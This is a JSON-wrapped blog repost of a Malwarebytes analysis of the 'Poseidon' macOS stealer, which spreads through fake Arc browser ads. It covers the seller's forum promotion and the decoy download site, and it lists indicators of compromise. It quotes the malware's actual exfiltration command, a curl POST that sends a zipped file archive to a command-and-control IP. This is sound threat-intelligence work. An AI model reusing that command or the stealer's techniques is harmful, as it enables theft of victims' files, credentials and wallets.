{"id":24773,"date":"2024-06-27T06:10:05","date_gmt":"2024-06-27T14:10:05","guid":{"rendered":"https:\/\/www.palada.net\/index.php\/2024\/06\/27\/news-18503\/"},"modified":"2024-06-27T06:10:05","modified_gmt":"2024-06-27T14:10:05","slug":"news-18503","status":"publish","type":"post","link":"https:\/\/www.palada.net\/index.php\/2024\/06\/27\/news-18503\/","title":{"rendered":"‘Poseidon’ Mac stealer distributed via Google ads"},"content":{"rendered":"\n

On June 24, we observed a new campaign distributing a stealer targeting Mac users via malicious Google ads for the Arc browser. This is the second time in the past couple of months where we see Arc being used as a lure, certainly a sign of its popularity. It was previously used to drop a Windows RAT<\/a>, also via Google ads.<\/p>\n

The macOS stealer being dropped in this latest campaign is actively being developed as an Atomic Stealer<\/a> competitor, with a large part of its code base being the same as its predecessor. Malwarebytes was previously tracking this payload as OSX.RodStealer<\/strong>, in reference to its author, Rodrigo4. The threat actor rebranded the new project ‘Poseidon’ and added a few new features such as looting VPN configurations.<\/p>\n

In this blog post, we review the advertisement of the new Poseidon campaign from the cyber crime forum announcement, to the distribution of the new Mac malware via malvertising.<\/p>\n

Rodrigo4 launches new PR campaign<\/h2>\n

A threat actor known by his handle as Rodrigo4 in the XSS underground forum has been working on a stealer with similar features and code base as the notorious Atomic Stealer (AMOS). The service consists of a malware panel with statistics and a builder with custom name, icon and AppleScript. The stealer offers functionalities reminescent of Atomic Stealer including: file grabber, crypto wallet extractor, password manager (Bitwarden, KeePassXC) stealer, and browser data collector.<\/p>\n

In a post last edited on Sunday, June 23, Rodrigo4 announced a new branding for their project:<\/p>\n

\"\"
Forum post by Rodrigo4 on XSS<\/figcaption><\/figure>\n
Hello everyone, we have released the V4 update and there are quite a lot of new things.
The very first thing that catches your eye is the name of the project: Poseidon. Why is that? For PR management. In simple words, people didn\u2019t know who we were.<\/pre>\n
Malware authors do need publicity, but we will try to stick to the facts and what we have observed in active malware delivery campaigns.<\/p>\n
Distribution via Google ads<\/h2>\n
We saw an ad for the Arc browser belonging to ‘Coles & Co’, linking to the domain name arcthost[.]org<\/em>:<\/p>\n
\"\"
Malicious ad for Arc browser via Google search<\/figcaption><\/figure>\n
People who clicked on the ad were redirected to arc-download[.]com<\/em>, a completely fake site offering Arc for Mac only:<\/p>\n
\"\"
Decoy website for Arc<\/figcaption><\/figure>\n
The downloaded DMG file resembles what one would expect when installing a new Mac application with the exception of the right-click to open trick to bypass security protections:<\/p>\n
\"\"
Malicious Arc DMG installer<\/figcaption><\/figure>\n
Connection to new Poseidon project<\/h2>\n
The new “Poseidon” stealer contains unfinished code that was seen by others<\/a>, and also recently advertised to steal VPN configurations from Fortinet and OpenVPN:<\/p>\n
\"\"
Excerpt from forum post featuring new VPN capability<\/figcaption><\/figure>\n
More interesting is the data exfiltration which is revealed in the following command:<\/p>\n
set result_send to (do shell script \"curl -X POST -H \\\"uuid: 399122bdb9844f7d934631745e22bd06\\\" -H \\\"user: H1N1_Group\\\" -H \\\"buildid: id777\\\" --data-binary @\/tmp\/out.zip http:\/\/ 79.137.192[.]4\/p2p\")<\/pre>\n
Navigating to this IP address reveals the new Poseidon branded panel:<\/p>\n
\"\"
Poseidon panel login page<\/figcaption><\/figure>\n
Conclusion<\/h2>\n
There is an active scene for Mac malware development focused on stealers. As we can see in this post, there are many contributing factors to such a criminal enterprise. The vendor needs to convince potential customers that their product is feature-rich and has low detection from antivirus software.<\/p>\n
Seeing campaigns distributing the new malware payload confirms that the threat is real and actively targeting new victims. Staying protected against these threats requires vigilance any time you download and install a new app.<\/p>\n
Malwarebytes for Mac<\/a> detects this this ‘Poseidon campaign as OSX.RodStealer<\/strong><\/em> and we have already shared information related to the malicious ad with Google. We highly recommend using web protection that blocks ads and malicious websites as your first line of defense. Malwarebytes Browser Guard<\/a> does both effectively.<\/p>\n
\"\"<\/figure>\n
\"\"<\/figure>\n
Indicators of Compromise<\/h2>\n
Google ad domain<\/p>\n
arcthost[.]org<\/pre>\n
Decoy site<\/p>\n
arc-download[.]com<\/pre>\n
Download URL<\/p>\n
zestyahhdog[.]com\/Arc12645413[.]dmg<\/pre>\n
Payload SHA256<\/p>\n
c1693ee747e31541919f84dfa89e36ca5b74074044b181656d95d7f40af34a05<\/pre>\n
C2<\/p>\n
79.137.192[.]4\/p2p<\/pre>\n
https:\/\/blog.malwarebytes.com\/feed\/<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"
 A competitor of the infamous Atomic Stealer targeting Mac users, has just launched a new campaign to lure in more victims. <\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[10488,10378],"tags":[30077,4503,10454,11658,12040],"class_list":["post-24773","post","type-post","status-publish","format-standard","hentry","category-malwarebytes","category-security","tag-atomic-stealer","tag-cybercrime","tag-mac","tag-poseidon","tag-threat-intelligence"],"_links":{"self":[{"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/24773","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/comments?post=24773"}],"version-history":[{"count":0,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/24773\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/media?parent=24773"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/categories?post=24773"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/tags?post=24773"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}